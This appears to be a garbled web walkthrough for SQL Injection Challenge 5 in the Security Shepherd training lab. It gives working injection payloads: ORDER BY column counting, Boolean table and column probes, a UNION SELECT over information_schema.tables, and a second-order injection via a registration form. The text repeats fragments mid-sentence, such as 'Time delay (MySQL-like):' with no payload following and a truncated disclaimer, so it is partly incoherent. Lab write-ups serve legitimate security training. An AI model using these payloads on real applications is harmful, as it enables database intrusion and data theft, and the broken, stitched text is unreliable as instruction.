Sql Injection Challenge 5 Security Shepherd 🌟

  • Time delay (MySQL-like):

    • (These are illustrative; actual payloads must be adapted to the app’s query structure and database engine.)

    In some versions of Security Shepherd, Challenge 5 is a Second-Order SQL Injection. You might inject a payload into a registration form (e.g., username: admin' -- ), which gets stored in the database. Later, when the admin views the "User List" page, your payload executes. This level requires thinking about the database as a persistence layer for attack strings.

    You need to find which table holds the key. Blindly guess common names like keys, secrets, hash. Using a Boolean condition:

    5' AND (SELECT COUNT(*) FROM keys) > 0 AND '1'='1

    If "Valid" appears, the table keys exists. Sql Injection Challenge 5 Security Shepherd

    Similarly, find the column: 5' AND (SELECT COUNT(secret) FROM keys) > 0 AND '1'='1

    If valid -> column secret exists in table keys.

    (Note: In many versions of Challenge 5, the table is ch5 and column is hash or key.)

    To perform a UNION SELECT, your injected query must have the same number of columns as the original query. We need to find this number. Time delay (MySQL-like):

    Try injecting the following payloads to test for column count using the ORDER BY technique:

    Payload 1: ' ORDER BY 1-- (If no error, there is at least 1 column)

    Payload 2: ' ORDER BY 2-- (If no error, there are at least 2 columns)

    Payload 3: ' ORDER BY 3-- (If no error, there are at least 3 columns) (These are illustrative; actual payloads must be adapted

    Payload 4: ' ORDER BY 4--

    If the application returns an error (or a blank page) at ORDER BY 4, but worked for ORDER BY 3, then the original query has 3 columns.

    We need to know the table where user data is stored. In MySQL (which Shepherd typically uses), this data is in information_schema.tables.

    Payload:

    ' UNION SELECT 1, table_name, 3 FROM information_schema.tables--

    Note: We use numbers 1 and 3 as placeholders for the columns we don't care about seeing.

    This injection will list table names. You look for a table named something like users or app_users.